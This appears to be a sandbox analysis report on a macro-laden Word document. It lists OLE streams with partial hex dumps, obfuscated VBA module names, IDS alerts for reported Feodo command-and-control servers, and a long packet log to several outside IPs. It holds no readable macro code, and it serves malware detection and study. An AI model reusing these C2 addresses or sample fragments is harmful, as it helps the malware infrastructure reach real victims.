Data Raw:	59 3c 9a 76 74 06 2a 16 1d 9f 50 4c d6 98 58 b0 4b a7 a8 78 70 28 10 a0 8c 37 8b e6 52 aa 0c 36 a9 2f 0f d3 dd 49 6d 1b f5 50 7e ae 3a 7e 79 3c 78 86 23 04 87 6d 76 30 2b f9 ea 3d 7a 44 c3 73 92 19 a3 a6 89 84 d2 01 39 8d 82 20 aa 61 66 0e bd 4f 6d cb 86 07 af 3b b9 de a7 e4 5e 30 a0 b1 8c 0a 1c 20 db d2 b2 f4 b4 21 cb fa eb 56 85 c9 93 dc 7f 2b d6 f8 ec 8a 69 67 ed aa dc ed a3 08

Stream Path: 1Table, File Type: data, Stream Size: 6861

General
Stream Path:	1Table
File Type:	data
Stream Size:	6861
Entropy:	6.02892947961
Base64 Encoded:	True
Data ASCII:	j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 517

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	517
Entropy:	5.51044136587
Base64 Encoded:	True
Data ASCII:	I D = " { 2 1 D F 1 D 8 3 - D A C 6 - 4 F C E - A 9 4 D - 2 C 7 0 E C 4 6 E 1 7 0 } " . . D o c u m e n t = B c u r 5 6 9 9 z 4 d / & H 0 0 0 0 0 0 0 0 . . M o d u l e = X x u u 2 1 l 7 k i w b x w j _ 0 . . M o d u l e = N s t 6 o t v n m g m p w . . E x e N a m e 3 2 = " W 9 i 7 s t p l 0 2 4 v g x r " . . N a m e = " Q w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 F 8 D 9 9 E 4 A 7 6 C E A 7 0 E A 7 0 E A 7 0 E A 7 0 " . . D P
Data Raw:	49 44 3d 22 7b 32 31 44 46 31 44 38 33 2d 44 41 43 36 2d 34 46 43 45 2d 41 39 34 44 2d 32 43 37 30 45 43 34 36 45 31 37 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 63 75 72 35 36 39 39 7a 34 64 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 58 78 75 75 32 31 6c 37 6b 69 77 62 78 77 6a 5f 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 73 74 36 6f 74 76 6e 6d 67 6d 70 77 0d 0a 45 78

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 134

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	134
Entropy:	3.95084728485
Base64 Encoded:	False
Data ASCII:	B c u r 5 6 9 9 z 4 d . B . c . u . r . 5 . 6 . 9 . 9 . z . 4 . d . . . X x u u 2 1 l 7 k i w b x w j _ 0 . X . x . u . u . 2 . 1 . l . 7 . k . i . w . b . x . w . j . _ . 0 . . . N s t 6 o t v n m g m p w . N . s . t . 6 . o . t . v . n . m . g . m . p . w . . . . .
Data Raw:	42 63 75 72 35 36 39 39 7a 34 64 00 42 00 63 00 75 00 72 00 35 00 36 00 39 00 39 00 7a 00 34 00 64 00 00 00 58 78 75 75 32 31 6c 37 6b 69 77 62 78 77 6a 5f 30 00 58 00 78 00 75 00 75 00 32 00 31 00 6c 00 37 00 6b 00 69 00 77 00 62 00 78 00 77 00 6a 00 5f 00 30 00 00 00 4e 73 74 36 6f 74 76 6e 6d 67 6d 70 77 00 4e 00 73 00 74 00 36 00 6f 00 74 00 76 00 6e 00 6d 00 67 00 6d 00 70 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5553

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	5553
Entropy:	5.57459869251
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 672

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	672
Entropy:	6.35085469527
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . Q 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . [ . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . . . m . . . . ! O f f i c
Data Raw:	01 9c b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 51 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 5b d8 f7 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d

Stream Path: WordDocument, File Type: data, Stream Size: 113278

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	113278
Entropy:	7.3453177245
Base64 Encoded:	True
Data ASCII:	. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . ] . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . . U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5f c0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 ad 5d 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e ba 01 00 62 7f 00 00 62 7f 00 00 ad 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/11/21-10:32:20.130132	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49165	191.6.196.95	192.168.2.22
02/11/21-10:33:58.195651	TCP	2404342	ET CNC Feodo Tracker Reported CnC Server TCP group 22	49175	80	192.168.2.22	84.232.229.24
02/11/21-10:34:09.027523	TCP	2404332	ET CNC Feodo Tracker Reported CnC Server TCP group 17	49176	8080	192.168.2.22	51.255.203.164

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 11, 2021 10:32:19.601501942 CET	49165	80	192.168.2.22	191.6.196.95
Feb 11, 2021 10:32:19.848912001 CET	80	49165	191.6.196.95	192.168.2.22
Feb 11, 2021 10:32:19.849109888 CET	49165	80	192.168.2.22	191.6.196.95
Feb 11, 2021 10:32:19.852366924 CET	49165	80	192.168.2.22	191.6.196.95
Feb 11, 2021 10:32:20.099498987 CET	80	49165	191.6.196.95	192.168.2.22
Feb 11, 2021 10:32:20.130131960 CET	80	49165	191.6.196.95	192.168.2.22
Feb 11, 2021 10:32:20.330898046 CET	49165	80	192.168.2.22	191.6.196.95
Feb 11, 2021 10:32:20.498606920 CET	49166	80	192.168.2.22	75.103.81.81
Feb 11, 2021 10:32:23.497950077 CET	49166	80	192.168.2.22	75.103.81.81
Feb 11, 2021 10:32:25.131429911 CET	80	49165	191.6.196.95	192.168.2.22
Feb 11, 2021 10:32:25.131501913 CET	49165	80	192.168.2.22	191.6.196.95
Feb 11, 2021 10:32:29.504441023 CET	49166	80	192.168.2.22	75.103.81.81
Feb 11, 2021 10:32:42.012885094 CET	49167	443	192.168.2.22	177.12.170.95
Feb 11, 2021 10:32:42.248145103 CET	443	49167	177.12.170.95	192.168.2.22
Feb 11, 2021 10:32:42.248507977 CET	49167	443	192.168.2.22	177.12.170.95
Feb 11, 2021 10:32:42.262522936 CET	49167	443	192.168.2.22	177.12.170.95
Feb 11, 2021 10:32:42.497574091 CET	443	49167	177.12.170.95	192.168.2.22
Feb 11, 2021 10:32:42.499939919 CET	443	49167	177.12.170.95	192.168.2.22
Feb 11, 2021 10:32:42.499974966 CET	443	49167	177.12.170.95	192.168.2.22
Feb 11, 2021 10:32:42.499993086 CET	443	49167	177.12.170.95	192.168.2.22
Feb 11, 2021 10:32:42.500077963 CET	49167	443	192.168.2.22	177.12.170.95
Feb 11, 2021 10:32:42.511046886 CET	49167	443	192.168.2.22	177.12.170.95
Feb 11, 2021 10:32:42.746530056 CET	443	49167	177.12.170.95	192.168.2.22
Feb 11, 2021 10:32:42.952863932 CET	49167	443	192.168.2.22	177.12.170.95
Feb 11, 2021 10:32:44.608587980 CET	49167	443	192.168.2.22	177.12.170.95
Feb 11, 2021 10:32:44.844605923 CET	443	49167	177.12.170.95	192.168.2.22
Feb 11, 2021 10:32:44.846957922 CET	49167	443	192.168.2.22	177.12.170.95
Feb 11, 2021 10:32:45.067545891 CET	49170	443	192.168.2.22	104.168.154.203
Feb 11, 2021 10:32:45.082865000 CET	443	49167	177.12.170.95	192.168.2.22
Feb 11, 2021 10:32:45.082916021 CET	443	49167	177.12.170.95	192.168.2.22
Feb 11, 2021 10:32:45.083053112 CET	49167	443	192.168.2.22	177.12.170.95
Feb 11, 2021 10:32:45.083101988 CET	49167	443	192.168.2.22	177.12.170.95
Feb 11, 2021 10:32:45.271888971 CET	443	49170	104.168.154.203	192.168.2.22
Feb 11, 2021 10:32:45.272022009 CET	49170	443	192.168.2.22	104.168.154.203
Feb 11, 2021 10:32:45.273515940 CET	49170	443	192.168.2.22	104.168.154.203
Feb 11, 2021 10:32:45.477648973 CET	443	49170	104.168.154.203	192.168.2.22
Feb 11, 2021 10:32:45.477931976 CET	443	49170	104.168.154.203	192.168.2.22
Feb 11, 2021 10:32:45.477978945 CET	443	49170	104.168.154.203	192.168.2.22
Feb 11, 2021 10:32:45.478023052 CET	443	49170	104.168.154.203	192.168.2.22
Feb 11, 2021 10:32:45.478029966 CET	49170	443	192.168.2.22	104.168.154.203
Feb 11, 2021 10:32:45.478066921 CET	49170	443	192.168.2.22	104.168.154.203
Feb 11, 2021 10:32:45.482757092 CET	49170	443	192.168.2.22	104.168.154.203
Feb 11, 2021 10:32:45.483310938 CET	49171	443	192.168.2.22	104.168.154.203
Feb 11, 2021 10:32:45.686863899 CET	443	49171	104.168.154.203	192.168.2.22
Feb 11, 2021 10:32:45.686912060 CET	443	49170	104.168.154.203	192.168.2.22
Feb 11, 2021 10:32:45.687060118 CET	49171	443	192.168.2.22	104.168.154.203
Feb 11, 2021 10:32:45.806761026 CET	49171	443	192.168.2.22	104.168.154.203
Feb 11, 2021 10:32:46.010572910 CET	443	49171	104.168.154.203	192.168.2.22
Feb 11, 2021 10:32:46.011337996 CET	443	49171	104.168.154.203	192.168.2.22
Feb 11, 2021 10:32:46.011387110 CET	443	49171	104.168.154.203	192.168.2.22
Feb 11, 2021 10:32:46.011413097 CET	443	49171	104.168.154.203	192.168.2.22
Feb 11, 2021 10:32:46.011503935 CET	49171	443	192.168.2.22	104.168.154.203
Feb 11, 2021 10:32:46.062047005 CET	49171	443	192.168.2.22	104.168.154.203
Feb 11, 2021 10:32:46.244350910 CET	49172	443	192.168.2.22	35.209.96.32
Feb 11, 2021 10:32:46.265675068 CET	443	49171	104.168.154.203	192.168.2.22
Feb 11, 2021 10:32:46.408684969 CET	443	49172	35.209.96.32	192.168.2.22
Feb 11, 2021 10:32:46.408832073 CET	49172	443	192.168.2.22	35.209.96.32
Feb 11, 2021 10:32:46.545527935 CET	49172	443	192.168.2.22	35.209.96.32
Feb 11, 2021 10:32:46.709803104 CET	443	49172	35.209.96.32	192.168.2.22
Feb 11, 2021 10:32:46.710107088 CET	443	49172	35.209.96.32	192.168.2.22
Feb 11, 2021 10:32:46.710197926 CET	443	49172	35.209.96.32	192.168.2.22
Feb 11, 2021 10:32:46.710542917 CET	49172	443	192.168.2.22	35.209.96.32
Feb 11, 2021 10:32:46.713505030 CET	49172	443	192.168.2.22	35.209.96.32
Feb 11, 2021 10:32:46.714006901 CET	49173	443	192.168.2.22	35.209.96.32
Feb 11, 2021 10:32:46.867851973 CET	443	49173	35.209.96.32	192.168.2.22
Feb 11, 2021 10:32:46.868021965 CET	49173	443	192.168.2.22	35.209.96.32
Feb 11, 2021 10:32:46.868396044 CET	49173	443	192.168.2.22	35.209.96.32
Feb 11, 2021 10:32:46.877584934 CET	443	49172	35.209.96.32	192.168.2.22
Feb 11, 2021 10:32:47.022239923 CET	443	49173	35.209.96.32	192.168.2.22
Feb 11, 2021 10:32:47.022499084 CET	443	49173	35.209.96.32	192.168.2.22
Feb 11, 2021 10:32:47.022528887 CET	443	49173	35.209.96.32	192.168.2.22
Feb 11, 2021 10:32:47.022645950 CET	49173	443	192.168.2.22	35.209.96.32
Feb 11, 2021 10:32:47.026027918 CET	49173	443	192.168.2.22	35.209.96.32
Feb 11, 2021 10:32:47.124773979 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:47.180026054 CET	443	49173	35.209.96.32	192.168.2.22
Feb 11, 2021 10:32:47.379100084 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:47.379256964 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:48.568178892 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:48.779088974 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:48.781119108 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:48.781141043 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:48.781161070 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:48.781174898 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:48.781244993 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:48.781269073 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:48.782140970 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:48.782161951 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:48.782222986 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:48.793319941 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:48.997495890 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.032043934 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.284266949 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.284298897 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.284318924 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.284339905 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.284360886 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.284380913 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.284395933 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.284400940 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.284416914 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.284421921 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.284446001 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.284447908 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.284470081 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.284490108 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.284499884 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.284512997 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.284528017 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.284885883 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.488596916 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.488663912 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.488715887 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.488759041 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.488784075 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.488806963 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.488830090 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.488853931 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.488863945 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.488877058 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.488898993 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.488905907 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.488931894 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.488940954 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.488954067 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.488976955 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.488981009 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.489000082 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.489022017 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.489034891 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.489044905 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.489068031 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.489069939 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.489098072 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.489116907 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.489123106 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.489145994 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.489167929 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.489175081 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.489192009 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.489213943 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.489226103 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.489237070 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.489255905 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.491931915 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.693319082 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693363905 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693433046 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693450928 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693463087 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693470955 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.693495035 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693515062 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693537951 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693542004 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.693559885 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693568945 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.693581104 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693598032 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693619013 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.693619013 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693636894 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693649054 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.693660975 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693681955 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693697929 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.693700075 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693716049 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693730116 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.693737030 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693753958 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.693758011 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693782091 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693797112 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693810940 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693826914 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693840981 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693856955 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693871975 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693887949 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693901062 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693916082 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.693929911 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.694937944 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.695947886 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.695998907 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696028948 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696057081 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696099043 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696115971 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696129084 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.696132898 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696150064 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696166039 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.696175098 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696192980 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.696197987 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696218967 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696237087 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.696239948 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696259975 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696275949 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.696280003 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696300983 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696316004 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.696325064 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696348906 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696369886 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.696372032 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.696404934 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.697705984 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.900152922 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900203943 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900254011 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900307894 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.900310993 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900356054 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.900377035 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900401115 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900424004 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900443077 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.900445938 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900470018 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900484085 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.900494099 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900521040 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900538921 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.900543928 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900564909 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900587082 CET	49174	443	192.168.2.22	35.163.191.195
Feb 11, 2021 10:32:49.900588036 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900612116 CET	443	49174	35.163.191.195	192.168.2.22
Feb 11, 2021 10:32:49.900626898 CET	49174	443	192.168.2.22	35.163.191.195
